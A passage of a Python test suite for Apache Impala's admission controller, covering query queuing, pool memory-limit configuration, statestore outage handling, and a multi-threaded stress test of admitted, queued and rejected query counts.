"admission-controller.total-queued.default-pool", 1)
# Queued queries don't show up on backends
self.__assert_num_queries_accounted(1, 1)
# First close the queued query
self.close_query(handle_queued)
self.close_query(handle_running)
self.__assert_num_queries_accounted(0)
# Case 3: When a query gets rejected
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "1b"
self.execute_query_expect_failure(self.client, query, exec_options)
self.__assert_num_queries_accounted(0)
def __assert_num_queries_accounted(self, num_running, num_queued=0):
"""Checks if the num of queries accounted by query_locations and in-flight are as
expected"""
# Wait for queries to start/un-register.
num_inflight = num_running + num_queued
assert self.impalad_test_service.wait_for_num_in_flight_queries(num_inflight)
query_locations = self.impalad_test_service.get_query_locations()
for host, num_q in query_locations.items():
assert num_q == num_running, "There should be {0} running queries on either " \
"impalads: {0}".format(query_locations)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml", make_copy=True),
statestored_args=_STATESTORED_ARGS)
def test_pool_mem_limit_configs(self, vector):
"""Runs functional tests for the max/min_query_mem_limit pool config attributes"""
exec_options = vector.get_value('exec_option')
# Set this to the default.
exec_options['exec_single_node_rows_threshold'] = 100
# Set num_nodes to 1 since its easier to see one-to-one mapping of per_host and
# per_cluster values used in the test.
exec_options['num_nodes'] = 1
self.run_test_case('QueryTest/admission-max-min-mem-limits', vector)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml",
additional_args="-default_pool_max_requests 1", make_copy=True),
statestored_args=_STATESTORED_ARGS)
def test_pool_config_change_while_queued(self, vector):
"""Tests that the invalid checks work even if the query is queued. Makes sure that a
queued query is dequeued and rejected if the config is invalid."""
pool_name = "invalidTestPool"
config_str = "max-query-mem-limit"
self.client.set_configuration_option('request_pool', pool_name)
# Setup to queue a query.
sleep_query_handle = self.client.execute_async("select sleep(10000)")
self.client.wait_for_admission_control(sleep_query_handle)
self.__wait_for_change_to_profile(sleep_query_handle,
"Admission result: Admitted immediately")
queued_query_handle = self.client.execute_async("select 2")
self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
# Change config to be invalid.
llama_site_path = os.path.join(RESOURCES_DIR, "copy-mem-limit-test-llama-site.xml")
config = ResourcePoolConfig(self.cluster.impalads[0].service, llama_site_path)
config.set_config_value(pool_name, config_str, 1)
# Close running query so the queued one gets a chance.
self.client.close_query(sleep_query_handle)
# Observe that the queued query fails.
self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20),
self.close_query(queued_query_handle)
# Change the config back to a valid value
config.set_config_value(pool_name, config_str, 0)
# Now do the same thing for change to pool.max-query-mem-limit such that it can no
# longer accommodate the largest min_reservation.
# Setup to queue a query.
sleep_query_handle = self.client.execute_async("select sleep(10000)")
self.client.wait_for_admission_control(sleep_query_handle)
queued_query_handle = self.client.execute_async(
"select * from functional_parquet.alltypes limit 1")
self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
# Change config to something less than the what is required to accommodate the
# largest min_reservation (which in this case is 32.09 MB.
config.set_config_value(pool_name, config_str, 25 * 1024 * 1024)
# Close running query so the queued one gets a chance.
self.client.close_query(sleep_query_handle)
# Observe that the queued query fails.
self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20),
self.close_query(queued_query_handle)
def __wait_for_change_to_profile(self, query_handle, search_string, timeout=20):
for _ in range(timeout * 10):
profile = self.client.get_runtime_profile(query_handle)
if search_string in profile:
return
sleep(0.1)
assert False, "Timed out waiting for change to profile\nSearch " \
"String: {0}\nProfile:\n{1}".format(search_string, str(profile))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024))
@needs_session()
def test_queuing_status_through_query_log_and_exec_summary(self):
"""Test to verify that the HS2 client's GetLog() call and the ExecSummary expose
the query's queuing status, that is, whether the query was queued and what was the
latest queuing reason."""
# Start a long running query.
long_query_resp = self.execute_statement("select sleep(10000)")
# Ensure that the query has started executing.
self.wait_for_admission_control(long_query_resp.operationHandle)
# Submit another query.
queued_query_resp = self.execute_statement("select 1")
# Wait until the query is queued.
self.wait_for_operation_state(queued_query_resp.operationHandle,
TCLIService.TOperationState.PENDING_STATE)
# Check whether the query log message correctly exposes the queuing status.
get_log_req = TCLIService.TGetLogReq()
get_log_req.operationHandle = queued_query_resp.operationHandle
log = self.hs2_client.GetLog(get_log_req).log
assert "Admission result : Queued" in log, log
assert "Latest admission queue reason : number of running queries 1 is at or over "
"limit 1" in log, log
# Now check the same for ExecSummary.
summary_req = ImpalaHiveServer2Service.TGetExecSummaryReq()
summary_req.operationHandle = queued_query_resp.operationHandle
summary_req.sessionHandle = self.session_handle
exec_summary_resp = self.hs2_client.GetExecSummary(summary_req)
assert exec_summary_resp.summary.is_queued
assert "number of running queries 1 is at or over limit 1" in \
exec_summary_resp.summary.queued_reason,\
exec_summary_resp.summary.queued_reason
# Close the running query.
self.close(long_query_resp.operationHandle)
# Close the queued query.
self.close(queued_query_resp.operationHandle)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=3,
pool_max_mem=1024 * 1024 * 1024) +
" --admission_control_stale_topic_threshold_ms={0}".format(
STALE_TOPIC_THRESHOLD_MS),
statestored_args=_STATESTORED_ARGS)
def test_statestore_outage(self):
"""Test behaviour with a failed statestore. Queries should continue to be admitted
but we should generate diagnostics about the stale topic."""
self.cluster.statestored.kill()
impalad = self.cluster.impalads[0]
# Sleep until the update should be definitely stale.
sleep(STALE_TOPIC_THRESHOLD_MS / 1000. * 1.5)
ac_json = impalad.service.get_debug_webpage_json('/admission')
ms_since_update = ac_json["statestore_admission_control_time_since_last_update_ms"]
assert ms_since_update > STALE_TOPIC_THRESHOLD_MS
assert ("Warning: admission control information from statestore is stale:" in
ac_json["statestore_update_staleness_detail"])
# Submit a batch of queries. One should get to run, one will be rejected because
# of the full queue, and the others will run after being queued.
STMT = "select sleep(100)"
TIMEOUT_S = 60
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, allow_query_failure=True)
ADMITTED_STALENESS_WARNING = \
"Warning: admission control information from statestore is stale"
ADMITTED_STALENESS_PROFILE_ENTRY = \
"Admission control state staleness: " + ADMITTED_STALENESS_WARNING
num_queued = 0
num_admitted_immediately = 0
num_rejected = 0
for profile in profiles:
if "Admission result: Admitted immediately" in profile:
assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
num_admitted_immediately += 1
elif "Admission result: Rejected" in profile:
num_rejected += 1
# Check that the rejection error returned to the client contains a warning.
query_statuses = [line for line in profile.split("\n")
if "Query Status:" in line]
assert len(query_statuses) == 1, profile
assert ADMITTED_STALENESS_WARNING in query_statuses[0]
else:
assert "Admission result: Admitted (queued)" in profile, profile
assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
# Check that the queued reason contains a warning.
queued_reasons = [line for line in profile.split("\n")
if "Initial admission queue reason:" in line]
assert len(queued_reasons) == 1, profile
assert ADMITTED_STALENESS_WARNING in queued_reasons[0]
num_queued += 1
assert num_admitted_immediately == 1
assert num_queued == 3
assert num_rejected == NUM_QUERIES - num_admitted_immediately - num_queued
@pytest.mark.execute_serially
def test_impala_server_startup_delay(self):
"""This test verifies that queries get queued when the coordinator has already started
accepting client connections during startup, but the local backend descriptor is not
yet available."""
server_start_delay_s = 20
# We need to start the cluster here instead of during setup_method() so we can launch
# it from a separate thread.
def start_cluster():
LOG.info("Starting cluster")
impalad_args = "--debug_actions=IMPALA_SERVER_END_OF_START:SLEEP@%s" % (
1000 * server_start_delay_s)
self._start_impala_cluster(['--impalad_args=%s' % impalad_args])
# Initiate the cluster start
start_cluster_thread = threading.Thread(target=start_cluster)
start_cluster_thread.start()
# Wait some time to arrive at IMPALA_SERVER_END_OF_START
sleep(server_start_delay_s)
# With a new client, execute a query and observe that it gets queued and ultimately
# succeeds.
client = self.create_impala_client()
result = self.execute_query_expect_success(client, "select 1")
start_cluster_thread.join()
profile = result.runtime_profile
reasons = self.__extract_init_queue_reasons([profile])
assert len(reasons) == 1
assert "Coordinator not registered with the statestore." in reasons[0]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_release_backends(self, vector):
"""Test that executor backends are shutdown when they complete, that completed
executor backends release their admitted memory, and that
NumCompletedBackends is updated each time an executor backend completes."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Craft a query where part of the executor backends completes, while the rest remain
# running indefinitely. The query forces the 'lineitem' table to be treated as the
# small table even though it is bigger than the 'customer' table. This forces the
# small table scan ('lineitem' scan) to run on two nodes and the big table scan
# ('customers' scan) to run on a single node. By using debug actions to force the
# big table scan to hang indefinitely, the small table scan should finish quickly.
# This causes one executor backend to complete quickly, and causes the other one to
# hang.
vector.get_value('exec_option')['debug_action'] = '0:GETNEXT:WAIT'
query = "select STRAIGHT_JOIN * from tpch.customer JOIN /* +BROADCAST */ " \
"tpch.lineitem where customer.c_custkey = lineitem.l_orderkey limit 100"
# Amount of time to wait for the query to reach the running state before throwing a
# Timeout exception.
timeout = 10
handle = self.execute_query_async(query, vector.get_value('exec_option'))
try:
# Wait for the query to reach the running state (it should never reach the finished
# state because of the 'WAIT' debug action), wait for the 'lineitem' scan to
# complete, and then validate that one of the executor backends shutdowns and
# releases its admitted memory.
self.wait_for_state(handle, self.client.QUERY_STATES['RUNNING'], timeout)
# Once the 'lineitem' scan completes, NumCompletedBackends should be 1.
self.assert_eventually(60, 1, lambda: "NumCompletedBackends: 1 (1)"
in self.client.get_runtime_profile(handle))
get_num_completed_backends(self.cluster.impalads[0].service,
handle.get_handle().id) == 1
mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
num_executor_zero_admitted = 0
for executor_mem_admitted in mem_admitted['executor']:
if executor_mem_admitted == 0:
num_executor_zero_admitted += 1
assert num_executor_zero_admitted == 1
finally:
# Once the query is closed, validate that all backends have shutdown.
self.client.close_query(handle)
mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
assert mem_admitted['coordinator'] == 0
for executor_mem_admitted in mem_admitted['executor']:
assert executor_mem_admitted == 0
class TestAdmissionControllerStress(TestAdmissionControllerBase):
"""Submits a number of queries (parameterized) with some delay between submissions
(parameterized) and the ability to submit to one impalad or many in a round-robin
fashion. Each query is submitted on a separate thread. After admission, the query
thread will block with the query open and wait for the main thread to notify it to
end its query. The query thread can end its query by fetching to the end, cancelling
itself, closing itself, or waiting for the query timeout to take effect. Depending
on the test parameters a varying number of queries will be admitted, queued, and
rejected. After the queries are admitted, the main thread will request each admitted
query thread to end its query and allow queued queries to be admitted.
The test tracks the state of the admission controller using the metrics from each
impalad to do the following:
(1) After submitting all queries, the change in metrics for the number of admitted,
queued, and rejected requests should sum to the number of queries and that the
values are reasonable given the test parameters.
(2) While there are running queries:
* Request the currently running queries to end and wait for the queries to end.
Verify the metric for the number of completed queries. The threads that
submitted those queries will keep their connections open until the entire test
completes. This verifies that admission control is tied to the end of the query
and does not depend on closing the connection.
* Check that queued requests are then dequeued and verify using the metric for the
number of dequeued requests. The threads that were waiting to submit the query
should then insert themselves into a list of currently running queries and then
wait for a notification from the main thread.
(3) After all queries have completed, check that the final number of admitted,
queued, and rejected requests are reasonable given the test parameters. When
submitting to a single impalad, we know exactly what the values should be,
otherwise we just check that they are within reasonable bounds.
"""
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionControllerStress, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('num_queries', *NUM_QUERIES))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('round_robin_submission', *ROUND_ROBIN_SUBMISSION))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('submission_delay_ms', *SUBMISSION_DELAY_MS))
# Additional constraints for code coverage jobs and core.
num_queries = None
if ImpalaTestClusterProperties.get_instance().has_code_coverage():
# Code coverage builds can't handle the increased concurrency.
num_queries = 15
elif cls.exploration_strategy() == 'core':
num_queries = 30
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('submission_delay_ms') == 0)
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('round_robin_submission'))
if num_queries is not None:
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('num_queries') == num_queries)
def setup(self):
# All threads are stored in this list and it's used just to make sure we clean up
# properly in teardown.
self.all_threads = list()
# Each submission thread will append() itself to this list if the query begins
# execution. The main thread will access this list to determine which threads are
# executing queries that can be cancelled (it will pop() elements from the front of
# the list). The individual operations on the list are atomic and thread-safe thanks
# to the GIL.
self.executing_threads = list()
def teardown(self):
# Set shutdown for all threads (cancel if needed)
for thread in self.all_threads:
try:
thread.lock.acquire()
thread.shutdown = True
if thread.query_handle is not None:
LOG.debug("Attempt to clean up thread executing query %s (state %s)",
thread.query_num, thread.query_state)
client = thread.impalad.service.create_beeswax_client()
try:
client.cancel(thread.query_handle)
finally:
client.close()
finally:
thread.lock.release()
# Wait for all threads to exit
for thread in self.all_threads:
thread.join(5)
LOG.debug("Join thread for query num %s %s", thread.query_num,
"TIMED OUT" if thread.isAlive() else "")
def get_admission_metrics(self):
"""
Returns a map of the admission metrics, aggregated across all of the impalads.
The metrics names are shortened for brevity: 'admitted', 'queued', 'dequeued',
'rejected', 'released', and 'timed-out'.
"""
metrics = {'admitted': 0, 'queued': 0, 'dequeued': 0, 'rejected': 0,
'released': 0, 'timed-out': 0}
for impalad in self.impalads:
keys = [metric_key(self.pool_name, 'total-%s' % short_name)
for short_name in metrics.keys()]
values = impalad.service.get_metric_values(keys, [0] * len(keys))
for short_name, value in zip(metrics.keys(), values):
metrics[short_name] += value
return metrics
def get_consistent_admission_metrics(self, num_submitted):
"""Same as get_admission_metrics() except retries until it gets consistent metrics for
num_submitted queries. See IMPALA-6227 for an example of problems with inconsistent
metrics where a dequeued query is reflected in dequeued but not admitted."""
ATTEMPTS = 5
for i in xrange(ATTEMPTS):
metrics = self.get_admission_metrics()
admitted_immediately = num_submitted - metrics['queued'] - metrics['rejected']
if admitted_immediately + metrics['dequeued'] == metrics['admitted']:
return metrics
LOG.info("Got inconsistent metrics {0}".format(metrics))
assert False, "Could not get consistent metrics for {0} queries after {1} attempts: "\
"{2}".format(num_submitted, ATTEMPTS, metrics)
def wait_for_metric_changes(self, metric_names, initial, expected_delta):
"""
Waits for the sum of metrics in metric_names to change by at least expected_delta.
This is similar to ImpalaService.wait_for_metric_value(), but it uses one or more
metrics aggregated across all impalads, e.g. we want to wait for the total number of
admitted, queued, and rejected metrics to change some amount in total, but we don't
know exactly how the metrics will change individually.
'metric_names' is a list of the keys returned by get_admission_metrics() which are
expected to change.
'initial' is the initial set of metrics returned by get_admission_metrics() to
compare against.
'expected_delta' is the total change expected across all impalads for the specified
metrics.
"""
log_metrics("wait_for_metric_changes, initial=", initial)
current = initial
start_time = time()
while True:
current = self.get_admission_metrics()
log_metrics("wait_for_metric_changes, current=", current)
deltas = compute_metric_deltas(current, initial)
delta_sum = sum([deltas[x] for x in metric_names])
LOG.info("DeltaSum=%s Deltas=%s (Expected=%s for metrics=%s)",
delta_sum, deltas, expected_delta, metric_names)
if delta_sum >= expected_delta:
LOG.info("Found all %s metrics after %s seconds", delta_sum,
round(time() - start_time, 1))
return (deltas, current)
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting {0} seconds for metrics {1} delta {2} "\
"current {3} initial {4}" .format(
STRESS_TIMEOUT, ','.join(metric_names), expected_delta, str(current),
str(initial))
sleep(1)
def wait_for_statestore_updates(self, heartbeats):
"""Waits for a number of admission control statestore updates from all impalads."""
start_time = time()
init = dict()
curr = dict()
for impalad in self.impalads:
init[impalad] = impalad.service.get_metric_value(
REQUEST_QUEUE_UPDATE_INTERVAL)['count']
curr[impalad] = init[impalad]
while True:
LOG.debug("wait_for_statestore_updates: curr=%s, init=%s, d=%s", curr.values(),
init.values(), [curr[i] - init[i] for i in self.impalads])
if all([curr[i] - init[i] >= heartbeats for i in self.impalads]): break
for impalad in self.impalads:
curr[impalad] = impalad.service.get_metric_value(
REQUEST_QUEUE_UPDATE_INTERVAL)['count']
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for heartbeats" % (STRESS_TIMEOUT,)
sleep(STATESTORE_RPC_FREQUENCY_MS / float(1000))
LOG.info("Waited %s for %s heartbeats", round(time() - start_time, 1), heartbeats)
def wait_for_admitted_threads(self, num_threads):
"""
Wait for query submission threads to update after being admitted, as determined
by observing metric changes. This is necessary because the metrics may change
before the execute_async() calls on the query threads return and add themselves
to self.executing_threads.
"""
start_time = time()
LOG.info("Waiting for %s threads to begin execution", num_threads)
# All individual list operations are thread-safe, so we don't need to use a
# lock to synchronize before checking the list length (on which another thread
# may call append() concurrently).
while len(self.executing_threads) < num_threads:
assert (time() - start_time < STRESS_TIMEOUT), ("Timed out waiting %s seconds for "
"%s admitted client rpcs to return. Only %s executing " % (
STRESS_TIMEOUT, num_threads, len(self.executing_threads)))
sleep(0.1)
LOG.info("Found all %s admitted threads after %s seconds", num_threads,
round(time() - start_time, 1))
def end_admitted_queries(self, num_queries):
"""
Requests each admitted query to end its query.
"""
assert len(self.executing_threads) >= num_queries
LOG.info("Requesting {0} clients to end queries".format(num_queries))
# Request admitted clients to end their queries
current_executing_queries = []
for i in xrange(num_queries):
# pop() is thread-safe, it's OK if another thread is appending concurrently.
thread = self.executing_threads.pop(0)
LOG.info("Cancelling query %s", thread.query_num)
assert thread.query_state == 'ADMITTED'
current_executing_queries.append(thread)
thread.query_state = 'REQUEST_QUERY_END'
# Wait for the queries to end
start_time = time()
while True:
all_done = True
for thread in self.all_threads:
if thread.query_state == 'REQUEST_QUERY_END':
all_done = False
if all_done:
break
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for query end" % (STRESS_TIMEOUT,)
sleep(1)
class SubmitQueryThread(threading.Thread):
def __init__(self, impalad, additional_query_options, vector, query_num,
query_end_behavior, executing_threads):
"""
executing_threads must be provided so that this thread can add itself when the
query is admitted and begins execution.
"""
super(self.__class__, self).__init__()
self.executing_threads = executing_threads
self.vector = vector
self.additional_query_options = additional_query_options
self.query_num = query_num
self.query_end_behavior = query_end_behavior
self.impalad = impalad
self.error = None
# query_state is defined and used only by the test code, not a property exposed by
# the server
self.query_state = 'NOT_SUBMITTED'
# lock protects query_handle and shutdown, used by the main thread in teardown()
self.lock = threading.RLock()
self.query_handle = None
self.shutdown = False # Set by the main thread when tearing down
def run(self):
client = None
try:
try:
# Take the lock while query_handle is being created to avoid an unlikely race
# condition with teardown() (i.e. if an error occurs on the main thread), and
# check if the test is already shut down.
self.lock.acquire()
if self.shutdown:
return
exec_options = self.vector.get_value('exec_option')
exec_options.update(self.additional_query_options)
query = QUERY.format(self.query_num)
self.query_state = 'SUBMITTING'
client = self.impalad.service.create_beeswax_client()
ImpalaTestSuite.change_database(client, self.vector.get_value('table_format'))
client.set_configuration(exec_options)
if self.query_end_behavior == 'QUERY_TIMEOUT':
client.execute("SET QUERY_TIMEOUT_S={0}".format(QUERY_END_TIMEOUT_S))
LOG.info("Submitting query %s", self.query_num)
self.query_handle = client.execute_async(query)
client.wait_for_admission_control(self.query_handle)
admission_result = client.get_admission_result(self.query_handle)
assert len(admission_result) > 0
if "Rejected" in admission_result:
LOG.info("Rejected query %s", self.query_num)
self.query_state = 'REJECTED'
self.query_handle = None
return
elif "Timed out" in admission_result:
LOG.info("Query %s timed out", self.query_num)
self.query_state = 'TIMED OUT'
self.query_handle = None
return
LOG.info("Admission result for query %s : %s", self.query_num, admission_result)
except ImpalaBeeswaxException as e:
LOG.exception(e)
raise e
finally:
self.lock.release()
LOG.info("Admitted query %s", self.query_num)
self.query_state = 'ADMITTED'
# The thread becomes visible to the main thread when it is added to the
# shared list of executing_threads. append() is atomic and thread-safe.
self.executing_threads.append(self)
# Synchronize with the main thread. At this point, the thread is executing a
# query. It needs to wait until the main thread requests it to end its query.
while not self.shutdown:
# The QUERY_TIMEOUT needs to stay active until the main thread requests it
# to end. Otherwise, the query may get cancelled early. Fetch rows 2 times
# per QUERY_TIMEOUT interval to keep the query active.
if self.query_end_behavior == 'QUERY_TIMEOUT' and \
self.query_state != 'COMPLETED':
fetch_result = client.fetch(query, self.query_handle, 1)
assert len(fetch_result.data) == 1, str(fetch_result)
if self.query_state == 'REQUEST_QUERY_END':
self._end_query(client, query)
# The query has released admission control resources
self.query_state = 'COMPLETED'
self.query_handle = None
sleep(QUERY_END_TIMEOUT_S / 6)
except Exception as e:
LOG.exception(e)
# Unknown errors will be raised later
self.error = e
self.query_state = 'ERROR'
finally:
LOG.info("Thread terminating in state=%s", self.query_state)
if client is not None:
client.close()
def _end_query(self, client, query):
"""Bring the query to the appropriate end state defined by self.query_end_behaviour.
Returns once the query has reached that state."""
LOG.info("Ending query %s by %s",
str(self.query_handle.get_handle()), self.query_end_behavior)
if self.query_end_behavior == 'QUERY_TIMEOUT':
# Sleep and wait for the query to be cancelled. The cancellation will
# set the state to EXCEPTION.
start_time = time()
while (client.get_state(self.query_handle) !=
client.QUERY_STATES['EXCEPTION']):
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for query cancel" % (STRESS_TIMEOUT,)
sleep(1)
elif self.query_end_behavior == 'EOS':
# Fetch all rows so we hit eos.
client.fetch(query, self.query_handle)
elif self.query_end_behavior == 'CLIENT_CANCEL':
client.cancel(self.query_handle)
else:
assert self.query_end_behavior == 'CLIENT_CLOSE'
client.close_query(self.query_handle)
def _check_queries_page_resource_pools(self):
"""Checks that all queries in the '/queries' webpage json have the correct resource
pool (this is called after all queries have been admitted, queued, or rejected, so
they should already have the pool set), or no pool for queries that don't go through
admission control."""
for impalad in self.impalads:
queries_json = impalad.service.get_debug_webpage_json('/queries')
for query in itertools.chain(queries_json['in_flight_queries'],
queries_json['completed_queries']):
if query['stmt_type'] == 'QUERY' or query['stmt_type'] == 'DML':
assert query['last_event'] != 'Registered' and \
query['last_event'] != 'Planning finished'
assert query['resource_pool'] == self.pool_name
else:
assert query['resource_pool'] == ''
def _get_queries_page_num_queued(self):
"""Returns the number of queries currently in the 'queued' state from the '/queries'
webpage json"""
num_queued = 0
for impalad in self.impalads:
queries_json = impalad.service.get_debug_webpage_json('/queries')
for query in queries_json['in_flight_queries']:
if query['last_event'] == 'Queued':
num_queued += 1
return num_queued
def run_admission_test(self, vector, additional_query_options):
LOG.info("Starting test case with parameters: %s", vector)
self.impalads = self.cluster.impalads
round_robin_submission = vector.get_value('round_robin_submission')
submission_delay_ms = vector.get_value('submission_delay_ms')
if not round_robin_submission:
self.impalads = [self.impalads[0]]
num_queries = vector.get_value('num_queries')
assert num_queries >= MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
initial_metrics = self.get_admission_metrics()
log_metrics("Initial metrics: ", initial_metrics)
for query_num in xrange(num_queries):
impalad = self.impalads[query_num % len(self.impalads)]
query_end_behavior = QUERY_END_BEHAVIORS[query_num % len(QUERY_END_BEHAVIORS)]
thread = self.SubmitQueryThread(impalad, additional_query_options, vector,
query_num, query_end_behavior, self.executing_threads)
thread.start()
self.all_threads.append(thread)
sleep(submission_delay_ms / 1000.0)
# Wait for the admission control to make the initial admission decision for all of
# the queries. They should either be admitted immediately, queued, or rejected.
# The test query is chosen that it with remain active on all backends until the test
# ends the query. This prevents queued queries from being dequeued in the background
# without this thread explicitly ending them, so that the test can admit queries in
# discrete waves.
LOG.info("Wait for initial admission decisions")
(metric_deltas, curr_metrics) = self.wait_for_metric_changes(
['admitted', 'queued', 'rejected'], initial_metrics, num_queries)
# Also wait for the test threads that submitted the queries to start executing.
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Check that the admission decisions are reasonable given the test parameters
# The number of admitted and queued requests should be at least the configured limits
# but less than or equal to those limits times the number of impalads.
assert metric_deltas['dequeued'] == 0,\
"Queued queries should not run until others are made to finish"
assert metric_deltas['admitted'] >= MAX_NUM_CONCURRENT_QUERIES,\
"Admitted fewer than expected queries"
assert metric_deltas['admitted'] <= MAX_NUM_CONCURRENT_QUERIES * len(self.impalads),\
"Admitted more than expected queries: at least one daemon over-admitted"
assert metric_deltas['queued'] >=\
min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES),\
"Should have queued more queries before rejecting them"
assert metric_deltas['queued'] <= MAX_NUM_QUEUED_QUERIES * len(self.impalads),\
"Queued too many queries: at least one daemon queued too many"
assert metric_deltas['rejected'] + metric_deltas['admitted'] +\
metric_deltas['queued'] == num_queries,\
"Initial admission decisions don't add up to {0}: {1}".format(
num_queries, str(metric_deltas))
initial_metric_deltas = metric_deltas
# Like above, check that the count from the queries webpage json is reasonable.
queries_page_num_queued = self._get_queries_page_num_queued()
assert queries_page_num_queued >=\
min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES)
assert queries_page_num_queued <= MAX_NUM_QUEUED_QUERIES * len(self.impalads)
self._check_queries_page_resource_pools()
# Admit queries in waves until all queries are done. A new wave of admission
# is started by killing some of the running queries.
while len(self.executing_threads) > 0:
curr_metrics = self.get_consistent_admission_metrics(num_queries)
log_metrics("Main loop, curr_metrics: ", curr_metrics)
num_to_end = len(self.executing_threads)
LOG.info("Main loop, will request %s queries to end", num_to_end)
self.end_admitted_queries(num_to_end)
self.wait_for_metric_changes(['released'], curr_metrics, num_to_end)
num_queued_remaining =\
curr_metrics['queued'] - curr_metrics['dequeued'] - curr_metrics['timed-out']
expected_admitted = min(num_queued_remaining, MAX_NUM_CONCURRENT_QUERIES)
(metric_deltas, _) = self.wait_for_metric_changes(
['admitted', 'timed-out'], curr_metrics, expected_admitted)
# The queue timeout is set high for these tests, so we don't expect any queries to
# time out.
assert metric_deltas['admitted'] >= expected_admitted
assert metric_deltas['timed-out'] == 0
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Wait a few topic updates to ensure the admission controllers have reached a steady
# state or we may find an impalad dequeue more requests after we capture metrics.
self.wait_for_statestore_updates(10)
final_metrics = self.get_consistent_admission_metrics(num_queries)
log_metrics("Final metrics: ", final_metrics)
metric_deltas = compute_metric_deltas(final_metrics, initial_metrics)
assert metric_deltas['timed-out'] == 0
if round_robin_submission:
min_expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] >= min_expected_admitted
assert metric_deltas['admitted'] <= min_expected_admitted * len(self.impalads)
assert metric_deltas['admitted'] ==\
initial_metric_deltas['admitted'] + initial_metric_deltas['queued']
assert metric_deltas['queued'] == initial_metric_deltas['queued']
assert metric_deltas['rejected'] == initial_metric_deltas['rejected']
else:
# We shouldn't go over the max number of queries or queue size so we can compute
# the expected number of queries that should have been admitted (which includes the
# number queued as they eventually get admitted as well), queued, and rejected
expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] == expected_admitted
assert metric_deltas['queued'] == MAX_NUM_QUEUED_QUERIES
assert metric_deltas['rejected'] == num_queries - expected_admitted
# All queries should be completed by now.
queries_page_num_queued = self._get_queries_page_num_queued()
assert queries_page_num_queued == 0
self._check_queries_page_resource_pools()
for thread in self.all_threads:
if thread.error is not None:
raise thread.error
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=MAX_NUM_CONCURRENT_QUERIES,
max_queued=MAX_NUM_QUEUED_QUERIES, pool_max_mem=-1, queue_wait_timeout_ms=600000),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_flags(self, vector):
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
self.pool_name = 'default-pool'
# The pool has no mem resources set, so submitting queries with huge mem_limits
# should be fine. This exercises the code that does the per-pool memory
# accounting (see MemTracker::GetPoolMemReserved()) without actually being throttled.
self.run_admission_test(vector, {'request_pool': self.pool_name,
'mem_limit': sys.maxint})
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml"),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_configs(self, vector):
self.pool_name = 'root.queueB'
self.run_admission_test(vector, {'request_pool': self.pool_name})
def get_proc_limit(self):
"""Gets the process mem limit as reported by the impalad's mem-tracker metric.
Raises an assertion if not all impalads have the same value."""
limit_metrics = []
for impalad in self.cluster.impalads:
limit_metrics.append(impalad.service.get_metric_value("mem-tracker.process.limit"))
assert limit_metrics[0] == limit_metrics[-1],\
"Not all impalads have the same process limit: %s" % (limit_metrics,)
assert limit_metrics[0] is not None
return limit_metrics[0]
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(
max_requests=MAX_NUM_CONCURRENT_QUERIES * 30, max_queued=MAX_NUM_QUEUED_QUERIES,
pool_max_mem=MEM_TEST_LIMIT, proc_mem_limit=MEM_TEST_LIMIT,
queue_wait_timeout_ms=600000),
statestored_args=_STATESTORED_ARGS)
def test_mem_limit(self, vector):
# Impala may set the proc mem limit lower than we think depending on the overcommit
